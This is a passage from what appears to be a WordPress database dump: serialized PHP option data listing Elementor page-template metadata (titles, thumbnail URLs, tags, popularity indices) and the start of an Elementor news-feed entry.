6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-6.png\";s:12:\"tmpl_created\";s:10:\"1491207507\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-6/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"116\";s:16:\"popularity_index\";s:3:\"352\";s:11:\"trend_index\";s:3:\"391\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:403;a:14:{s:2:\"id\";s:4:\"1261\";s:5:\"title\";s:13:\"Coming Soon 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/04/Coming-Soon-7.png\";s:12:\"tmpl_created\";s:10:\"1491207584\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-7/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"117\";s:16:\"popularity_index\";s:2:\"44\";s:11:\"trend_index\";s:2:\"91\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:404;a:14:{s:2:\"id\";s:4:\"1272\";s:5:\"title\";s:13:\"Coming Soon 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-8.png\";s:12:\"tmpl_created\";s:10:\"1491207674\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-8/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"118\";s:16:\"popularity_index\";s:3:\"198\";s:11:\"trend_index\";s:3:\"252\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:405;a:14:{s:2:\"id\";s:4:\"1279\";s:5:\"title\";s:13:\"Coming Soon 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/03/Coming-Soon-9.png\";s:12:\"tmpl_created\";s:10:\"1491207756\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/coming-soon-9/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"119\";s:16:\"popularity_index\";s:2:\"70\";s:11:\"trend_index\";s:3:\"223\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:406;a:14:{s:2:\"id\";s:4:\"1745\";s:5:\"title\";s:14:\"Coming Soon 10\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-002.png\";s:12:\"tmpl_created\";s:10:\"1494849745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/coming-soon-10/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"120\";s:16:\"popularity_index\";s:3:\"195\";s:11:\"trend_index\";s:3:\"261\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:407;a:14:{s:2:\"id\";s:4:\"1742\";s:5:\"title\";s:12:\"Login Page 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-003.png\";s:12:\"tmpl_created\";s:10:\"1494849744\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:100:\"https://library.elementor.com/login-page/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"121\";s:16:\"popularity_index\";s:3:\"330\";s:11:\"trend_index\";s:3:\"394\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:408;a:14:{s:2:\"id\";s:4:\"1748\";s:5:\"title\";s:12:\"Login Page 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/login-001.png\";s:12:\"tmpl_created\";s:10:\"1494849742\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/login-page-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"122\";s:16:\"popularity_index\";s:3:\"196\";s:11:\"trend_index\";s:3:\"317\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:409;a:14:{s:2:\"id\";s:4:\"3963\";s:5:\"title\";s:32:\"Restaurant Site &#8211; Homepage\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/01/R.HomepageThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284821\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/restaurant-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"123\";s:16:\"popularity_index\";s:3:\"188\";s:11:\"trend_index\";s:3:\"328\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:410;a:14:{s:2:\"id\";s:4:\"3969\";s:5:\"title\";s:28:\"Restaurant Site &#8211; Menu\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2018/01/R.MenuThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284829\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/restaurant-site-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"124\";s:16:\"popularity_index\";s:3:\"348\";s:11:\"trend_index\";s:3:\"338\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:411;a:14:{s:2:\"id\";s:4:\"3966\";s:5:\"title\";s:29:\"Restaurant Site &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2018/01/R.AboutThumb.png.png\";s:12:\"tmpl_created\";s:10:\"1516284839\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/restaurant-site-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"125\";s:16:\"popularity_index\";s:3:\"207\";s:11:\"trend_index\";s:3:\"275\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:412;a:14:{s:2:\"id\";s:4:\"3972\";s:5:\"title\";s:31:\"Restaurant Site &#8211; Contact\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/01/R.ContactThumb.png\";s:12:\"tmpl_created\";s:10:\"1516284847\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/restaurant-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:109:\"[\"bar\",\"cafe\",\"cooking\",\"drink\",\"events\",\"fast food\",\"Food\",\"menu\",\"modern\",\"reservation\",\"Shop\",\"snack bar\"]\";s:10:\"menu_order\";s:3:\"126\";s:16:\"popularity_index\";s:3:\"303\";s:11:\"trend_index\";s:3:\"389\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:413;a:14:{s:2:\"id\";s:4:\"2080\";s:5:\"title\";s:27:\"Ski Resort &#8211; Homepage\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508161124\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"127\";s:16:\"popularity_index\";s:3:\"263\";s:11:\"trend_index\";s:3:\"339\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:414;a:14:{s:2:\"id\";s:4:\"2088\";s:5:\"title\";s:24:\"Ski Resort &#8211; About\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-About.png\";s:12:\"tmpl_created\";s:10:\"1508161129\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/ski-resort-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"128\";s:16:\"popularity_index\";s:3:\"351\";s:11:\"trend_index\";s:3:\"382\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:415;a:14:{s:2:\"id\";s:4:\"2085\";s:5:\"title\";s:27:\"Ski Resort &#8211; Services\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Services.png\";s:12:\"tmpl_created\";s:10:\"1508161134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"129\";s:16:\"popularity_index\";s:3:\"394\";s:11:\"trend_index\";s:3:\"405\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:416;a:14:{s:2:\"id\";s:4:\"2462\";s:5:\"title\";s:23:\"Architect &#8211; About\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/architect-–-about.png\";s:12:\"tmpl_created\";s:10:\"1508243317\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/architect-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"130\";s:16:\"popularity_index\";s:3:\"272\";s:11:\"trend_index\";s:3:\"353\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:417;a:14:{s:2:\"id\";s:4:\"2362\";s:5:\"title\";s:26:\"Architect &#8211; Projects\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2017/10/Architect-Projects.png\";s:12:\"tmpl_created\";s:10:\"1508243335\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/architect-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"131\";s:16:\"popularity_index\";s:3:\"343\";s:11:\"trend_index\";s:3:\"366\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:418;a:14:{s:2:\"id\";s:3:\"614\";s:5:\"title\";s:25:\"Architect &#8211; Contact\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2016/12/architect-contact.jpg\";s:12:\"tmpl_created\";s:10:\"1481549169\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/architect-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"132\";s:16:\"popularity_index\";s:3:\"174\";s:11:\"trend_index\";s:3:\"327\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:419;a:14:{s:2:\"id\";s:4:\"2126\";s:5:\"title\";s:37:\"Construction Company &#8211; Homepage\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Home-Page.png\";s:12:\"tmpl_created\";s:10:\"1508325849\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-company-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"133\";s:16:\"popularity_index\";s:3:\"228\";s:11:\"trend_index\";s:3:\"272\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:420;a:14:{s:2:\"id\";s:4:\"2129\";s:5:\"title\";s:34:\"Construction Company &#8211; About\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-About.png\";s:12:\"tmpl_created\";s:10:\"1508325881\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/construction-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"134\";s:16:\"popularity_index\";s:3:\"260\";s:11:\"trend_index\";s:3:\"299\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:421;a:14:{s:2:\"id\";s:4:\"2135\";s:5:\"title\";s:36:\"Construction Company &#8211; Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";s:10:\"1508325922\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"135\";s:16:\"popularity_index\";s:3:\"286\";s:11:\"trend_index\";s:3:\"310\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:422;a:14:{s:2:\"id\";s:4:\"2094\";s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";s:10:\"1509621053\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"136\";s:16:\"popularity_index\";s:3:\"244\";s:11:\"trend_index\";s:3:\"253\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:423;a:14:{s:2:\"id\";s:4:\"2120\";s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";s:10:\"1509631820\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"137\";s:16:\"popularity_index\";s:3:\"278\";s:11:\"trend_index\";s:3:\"315\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:424;a:14:{s:2:\"id\";s:4:\"3619\";s:5:\"title\";s:31:\"Snowboard Site &#8211; Homepage\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2017/12/home.png\";s:12:\"tmpl_created\";s:10:\"1513513137\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"138\";s:16:\"popularity_index\";s:3:\"261\";s:11:\"trend_index\";s:3:\"287\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:425;a:14:{s:2:\"id\";s:4:\"3632\";s:5:\"title\";s:31:\"Snowboard Site &#8211; Services\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/2.png\";s:12:\"tmpl_created\";s:10:\"1513513171\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/snowboard-site-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"139\";s:16:\"popularity_index\";s:3:\"225\";s:11:\"trend_index\";s:3:\"270\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:426;a:14:{s:2:\"id\";s:4:\"3626\";s:5:\"title\";s:30:\"Snowboard Site &#8211; Contact\";s:9:\"thumbnail\";s:62:\"https://library.elementor.com/wp-content/uploads/2017/12/3.png\";s:12:\"tmpl_created\";s:10:\"1513513193\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/snowboard-site-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"140\";s:16:\"popularity_index\";s:3:\"226\";s:11:\"trend_index\";s:3:\"239\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:427;a:14:{s:2:\"id\";s:4:\"3153\";s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";s:10:\"1508950132\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"141\";s:16:\"popularity_index\";s:3:\"398\";s:11:\"trend_index\";s:3:\"435\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:428;a:14:{s:2:\"id\";s:4:\"3338\";s:5:\"title\";s:31:\"Black Friday &#8211; Nature Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";s:10:\"1511203351\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"142\";s:16:\"popularity_index\";s:3:\"382\";s:11:\"trend_index\";s:3:\"409\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:429;a:14:{s:2:\"id\";s:4:\"3339\";s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";s:10:\"1511203636\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"143\";s:16:\"popularity_index\";s:3:\"347\";s:11:\"trend_index\";s:3:\"411\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:430;a:14:{s:2:\"id\";s:4:\"3335\";s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";s:10:\"1511203246\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"144\";s:16:\"popularity_index\";s:3:\"344\";s:11:\"trend_index\";s:3:\"423\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:431;a:14:{s:2:\"id\";s:4:\"3340\";s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";s:10:\"1511203713\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"145\";s:16:\"popularity_index\";s:3:\"336\";s:11:\"trend_index\";s:3:\"416\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:432;a:14:{s:2:\"id\";s:4:\"3517\";s:5:\"title\";s:27:\"Christmas &#8211; Gift Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasThumb.png\";s:12:\"tmpl_created\";s:10:\"1513877937\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-gift-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"146\";s:16:\"popularity_index\";s:3:\"381\";s:11:\"trend_index\";s:3:\"276\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:433;a:14:{s:2:\"id\";s:4:\"3734\";s:5:\"title\";s:28:\"Christmas &#8211; Car Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v3.png\";s:12:\"tmpl_created\";s:10:\"1514197794\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/christmas-car-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"147\";s:16:\"popularity_index\";s:3:\"391\";s:11:\"trend_index\";s:3:\"295\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:434;a:14:{s:2:\"id\";s:4:\"3764\";s:5:\"title\";s:33:\"Christmas &#8211; Interior Design\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v6.png\";s:12:\"tmpl_created\";s:10:\"1514198234\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/christmas-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"148\";s:16:\"popularity_index\";s:3:\"374\";s:11:\"trend_index\";s:3:\"357\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:435;a:14:{s:2:\"id\";s:4:\"3565\";s:5:\"title\";s:27:\"Christmas &#8211; Tree Shop\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasTreeThumb.png\";s:12:\"tmpl_created\";s:10:\"1514204382\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-tree-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"149\";s:16:\"popularity_index\";s:3:\"355\";s:11:\"trend_index\";s:3:\"250\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:436;a:14:{s:2:\"id\";s:4:\"3862\";s:5:\"title\";s:35:\"Christmas &#8211; Design Conference\";s:9:\"thumbnail\";s:63:\"https://library.elementor.com/wp-content/uploads/2017/12/q1.png\";s:12:\"tmpl_created\";s:10:\"1514206745\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/christmas-design-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"150\";s:16:\"popularity_index\";s:3:\"320\";s:11:\"trend_index\";s:3:\"385\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:437;a:14:{s:2:\"id\";s:4:\"3777\";s:5:\"title\";s:39:\"Christmas &#8211; Snowboard Competition\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v7.png\";s:12:\"tmpl_created\";s:10:\"1514205420\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/christmas-snowboard-competition/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"151\";s:16:\"popularity_index\";s:3:\"345\";s:11:\"trend_index\";s:3:\"246\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:438;a:14:{s:2:\"id\";s:3:\"420\";s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";s:10:\"1475067229\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"152\";s:16:\"popularity_index\";s:2:\"14\";s:11:\"trend_index\";s:2:\"19\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}}}','no'),(89620,'elementor_remote_info_feed_data','a:3:{i:0;a:5:{s:5:\"title\";s:37:\"Jupiter Theme Rebuilt Using Elementor\";s:7:\"excerpt\";s:124:\"Jupiter Theme joins the Elementor family and releases its new Jupiter X theme, rebuilt from the ground up using Elementor.\r\n\";s:7:\"created\";s:10:\"1544630452\";s:5:\"badge\";s:0:\"\";s:3:\"url\";s:109:\"https://elementor.com/blog/jupiter-x/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:57:\"Social Media - The Secret Sauce for 